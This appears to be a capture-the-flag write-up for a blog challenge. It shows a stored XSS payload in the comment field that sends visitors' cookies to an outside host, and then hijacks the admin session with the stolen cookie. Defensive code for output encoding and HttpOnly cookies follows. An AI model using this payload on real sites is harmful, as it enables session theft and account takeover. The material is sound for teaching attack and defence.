A friend of mine has stolen my cat's picture on his blog. I want to log in as admin user on his blog. Do you have any idea?
The Blog

Solution:
1. Access the blog. Found input fields (user, comment, captcha); user and comment are vulnerable to Cross-site Scripting (XSS).
2. <script>new Image().src = 'http://www.my.site/icheernoom.php?cookies=' + encodeURI(document.cookie);</script>
3. Wait a minute and get some cookies in my site's access log.
4. "Login as admin": I guess the admin page is /admin.php; found it, and it redirects to /login.php. Try to access it with the admin's cookie.
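
From the blog owner's side, both halves of this chain can be closed: encode the user and comment fields on output, and mark the session cookie HttpOnly so document.cookie never exposes it. The sketch below is an added example, not code from the challenge; the function names and the cookie name "sid" are hypothetical, and the sample values are constructed.

```javascript
// Added defensive example; all names here are hypothetical, not from the challenge.

// Characters that change meaning in HTML text and in quoted attribute values.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode untrusted text for an HTML text node or a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render one stored comment; both user-controlled fields are encoded on output.
function renderComment(user, comment) {
  return '<div class="comment"><b>' + escapeHtml(user) + '</b>: ' + escapeHtml(comment) + '</div>';
}

// Build the session cookie so that script running in the page cannot read it.
function buildSessionCookie(name, value) {
  return name + '=' + encodeURIComponent(value) + '; Path=/; HttpOnly; Secure; SameSite=Strict';
}

// Return the protective attributes missing from a Set-Cookie header value.
function missingCookieFlags(setCookie) {
  const attrs = setCookie.split(';').slice(1).map((a) => a.trim().toLowerCase().split('=')[0]);
  return ['httponly', 'secure', 'samesite'].filter((flag) => !attrs.includes(flag));
}

// Constructed sample input: the comment payload from step 2 of the write-up.
const SAMPLE_COMMENT =
  "<script>new Image().src = 'http://www.my.site/icheernoom.php?cookies=' + encodeURI(document.cookie);</script>";

// Run the checks on the sample: encoded comment, a weak cookie, a hardened cookie.
function demo() {
  return {
    html: renderComment('guest', SAMPLE_COMMENT),
    weak: missingCookieFlags('sid=abc123; path=/'),
    hardened: missingCookieFlags(buildSessionCookie('sid', 'abc123')),
  };
}

console.log(demo());
```

With the comment encoded, the browser displays the payload as text instead of running it, and a cookie carrying HttpOnly would not appear in document.cookie even if a script did run.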